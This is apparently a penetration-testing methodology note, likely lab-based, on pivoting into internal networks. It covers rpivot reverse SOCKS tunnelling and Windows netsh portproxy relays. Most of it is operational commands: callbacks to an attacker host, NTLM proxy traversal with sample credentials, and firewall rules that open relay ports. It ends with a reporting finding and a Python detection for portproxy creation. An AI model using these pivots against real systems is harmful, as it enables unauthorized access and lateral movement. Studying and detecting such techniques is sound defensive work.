Methodology Checklist
- netsh portproxy (no binary needed): netsh interface portproxy add v4tov4 listenport=[PORT] connectaddress=[DEST] connectport=[PORT]
- Verify: netsh interface portproxy show all
- rpivot: start server on attacker, upload and run client.py on Windows pivot
- Configure Proxychains to use rpivot SOCKS port
- Attack internal targets through proxy
- Cleanup netsh: netsh interface portproxy delete v4tov4 listenport=[PORT]
Operational Context
Use when: HTTP-only egress or a Windows pivot with no additional tools. rpivot gives an HTTP CONNECT proxy; netsh portproxy gives a TCP relay without binaries.
Think Dumber First: netsh portproxy = zero binary requirement: netsh interface portproxy add v4tov4 listenport=[LPORT] connectaddress=[DEST] connectport=[DPORT]. This is a single Windows command that creates a TCP relay. No file transfer, no AV concerns.
Skip when: SSH or Chisel is available; both are more flexible than netsh portproxy.
Tactical Cheatsheet
| Command | Tactical Outcome |
|---|---|
| python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0 | Rpivot: start SOCKS server on attack host |
| scp -r rpivot [USER]@[PIVOT_IP]:/home/ubuntu/ | Transfer rpivot to pivot host |
| python2.7 client.py --server-ip [LHOST] --server-port 9999 | Rpivot: pivot connects back to attack host |
| python client.py --server-ip [LHOST] --server-port 9999 --ntlm-proxy-ip [PROXY_IP] --ntlm-proxy-port 8080 --domain [DOMAIN] --username [USER] --password [PASS] | Rpivot: traverse corporate NTLM proxy |
| proxychains firefox-esr 172.16.5.135:80 | Access internal web service via Rpivot SOCKS tunnel |
| netsh.exe interface portproxy add v4tov4 listenport=[LPORT] listenaddress=[PIVOT_IP] connectport=[TARGET_PORT] connectaddress=[INTERNAL_IP] | Windows netsh: create port forward rule (requires admin) |
| netsh.exe interface portproxy show v4tov4 | Verify netsh port forward rules |
| netsh advfirewall firewall add rule name="Pivot_Forward" dir=in action=allow protocol=TCP localport=[LPORT] | Open Windows firewall for the netsh listen port |
| xfreerdp3 /v:[PIVOT_IP]:[LPORT] /u:[TARGET_USER] /p:[TARGET_PASS] +clipboard | Connect through netsh portproxy |
| netsh interface portproxy delete v4tov4 listenport=[LPORT] listenaddress=[PIVOT_IP] | Remove netsh port forward (cleanup) |
| sc query iphlpsvc | Check IP Helper service (required for netsh portproxy) |
Deep Dive & Workflow
Rpivot: Reverse SOCKS Proxy (Python 2.7)
Use when SSH is blocked/unavailable and the pivot can reach out but you can't reach in. Reverse connection model: the pivot initiates the connection back to your attack host.
Requires Python 2.7, which is often missing on modern systems:
```
# Install on attack host if needed
sudo apt-get install python2.7
# Or use pyenv for a local install without apt
```
Full workflow:
```
# Attack host: start SOCKS server
cd rpivot
python2.7 server.py --proxy-port 9050 --server-port 9999 --server-ip 0.0.0.0
# proxy-port: what proxychains uses
# server-port: what pivot connects to

# Transfer to pivot
scp -r rpivot ubuntu@10.129.202.64:/home/ubuntu/

# Pivot host: call home
cd rpivot
python2.7 client.py --server-ip 10.10.14.18 --server-port 9999
# Success: "New connection from host ..." appears on attack host

# Configure proxychains
echo "socks4 127.0.0.1 9050" >> /etc/proxychains.conf

# Use
proxychains firefox-esr 172.16.5.135:80
```
NTLM proxy traversal (corporate environments):
```
python client.py --server-ip 10.10.14.18 --server-port 9999 \
  --ntlm-proxy-ip 172.16.5.1 --ntlm-proxy-port 8080 \
  --domain INLANEFREIGHT --username forend --password Klmcargo2
```
Server vs Client roles:
| Component | Runs On | Role |
|---|---|---|
| server.py | Attack host | Listens for callback, opens SOCKS port |
| client.py | Pivot host | Connects outbound to attacker |
Windows Netsh Portproxy: Native Windows Pivot
Use when you have a compromised Windows host and need to forward traffic to an internal target. No external binaries needed; it is built into Windows.
```
# On Windows pivot (admin CMD):
# Forward: Pivot:8080 -> Internal:3389
netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 connectport=3389 connectaddress=172.16.5.25

# Verify
netsh.exe interface portproxy show v4tov4

# CRITICAL: the netsh rule does NOT open the firewall port automatically
netsh advfirewall firewall add rule name="Pivot_Forward" dir=in action=allow protocol=TCP localport=8080

# Connect from attack host using the TARGET's credentials (not the pivot's)
xfreerdp3 /v:10.129.15.150:8080 /u:victor /p:pass@123 +clipboard

# Cleanup
netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=10.129.15.150
```
Prerequisites:
- Admin rights on Windows pivot
- IP Helper service running: sc query iphlpsvc
- Specify listenaddress explicitly to prevent IPv6 binding ambiguity
Troubleshooting & Edge Cases
| Problem | Cause | Fix |
|---|---|---|
| netsh portproxy requires elevation | UAC prompt | Run from elevated prompt; net session to verify admin; or use Chisel as alternative |
| rpivot not working | Python2 dependency | rpivot requires Python2: python2 client.py --server-ip [ATTACKER] --server-port 9999; not Python3 compatible |
| netsh portproxy relay drops connections | Firewall rule needed | Add: netsh advfirewall firewall add rule name=pivot dir=in action=allow protocol=TCP localport=[LPORT] |
| rpivot HTTP proxy not routing all traffic | CONNECT method required | Configure proxychains to use CONNECT proxy; rpivot creates HTTP CONNECT proxy on port 1080 |
| netsh portproxy breaks after reboot | Not persistent | Add registry entry to persist; or re-run command after reboot |
Reporting Trigger
Finding Title: TCP Port Forwarding via netsh Enables Internal Resource Access
Impact: Windows netsh portproxy creates a TCP relay without requiring any external binary or tool transfer, enabling access to internal services from an external attacker position using only built-in Windows functionality.
Root Cause: netsh is a trusted Windows administrative tool that creates listening TCP ports without triggering application allowlisting. No monitoring of netsh portproxy rule creation.
Recommendation: Monitor netsh command execution for portproxy rule creation. Alert on unexpected listening ports on Windows servers. Implement host-based firewall logging for new inbound port access.
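The recommendation above (monitor netsh execution for portproxy rule creation) as a worked detection, added here as an example and not part of the original notes: it classifies process-creation command lines, extracts the relay's listen and connect endpoints, and raises severity when a firewall allow rule opens the same listen port on the same host (the two-step pattern shown in the netsh workflow). The sample event records and host/user names are constructed for the example.

```python
import re

# Constructed sample process-creation records (Windows 4688 / Sysmon Event ID 1 style), reduced to the
# three fields the detection needs. Not real telemetry.
SAMPLE_EVENTS = [
    {"host": "WS01", "user": "CORP\\victor", "cmd":
     "netsh.exe interface portproxy add v4tov4 listenport=8080 listenaddress=10.129.15.150 "
     "connectport=3389 connectaddress=172.16.5.25"},
    {"host": "WS01", "user": "CORP\\victor", "cmd":
     'netsh advfirewall firewall add rule name="Pivot_Forward" dir=in action=allow protocol=TCP localport=8080'},
    {"host": "SRV02", "user": "CORP\\svc_backup", "cmd": "netsh interface ipv4 show config"},
    {"host": "SRV02", "user": "CORP\\admin", "cmd": "netsh interface portproxy show v4tov4"},
]

# "add" is the only portproxy verb that creates a relay; "show" and "delete" are routine admin use.
PORTPROXY_ADD = re.compile(r"\bportproxy\b.*\badd\b\s+v[46]tov[46]\b", re.IGNORECASE)
FIREWALL_ADD = re.compile(r"\badvfirewall\b.*\bfirewall\s+add\s+rule\b", re.IGNORECASE)
KV = re.compile(r'(\w+)=("[^"]*"|\S+)')  # netsh key=value arguments, quoted or bare

def parse_kv(cmd):
    """Turn netsh's key=value arguments into a dict (quotes stripped, keys lower-cased)."""
    return {k.lower(): v.strip('"') for k, v in KV.findall(cmd)}

def classify(event):
    """Return an alert dict for a netsh command of interest, else None."""
    cmd, kv = event["cmd"], parse_kv(event["cmd"])
    base = {"host": event["host"], "user": event["user"]}
    if PORTPROXY_ADD.search(cmd):
        return {**base, "rule": "netsh_portproxy_add",
                "listen": f"{kv.get('listenaddress', '*')}:{kv.get('listenport', '?')}",
                "connect": f"{kv.get('connectaddress', '?')}:{kv.get('connectport', '?')}"}
    if FIREWALL_ADD.search(cmd) and kv.get("dir", "").lower() == "in" and kv.get("action", "").lower() == "allow":
        return {**base, "rule": "netsh_firewall_allow_inbound", "localport": kv.get("localport")}
    return None

def detect(events):
    """Classify every event, then correlate: a firewall allow for a freshly created relay port is high severity."""
    alerts = [a for a in map(classify, events) if a]
    relay_ports = {(a["host"], a["listen"].rsplit(":", 1)[1])
                   for a in alerts if a["rule"] == "netsh_portproxy_add"}
    for a in alerts:
        if a["rule"] == "netsh_portproxy_add":
            a["severity"] = "medium"
        elif (a["host"], a["localport"]) in relay_ports:
            a["severity"] = "high"  # relay created AND exposed through the host firewall
        else:
            a["severity"] = "low"   # inbound allow with no matching relay: review, not pivot evidence
    return alerts
```

In a SIEM the same correlation would run over a time window per host; here the batch stands in for that window.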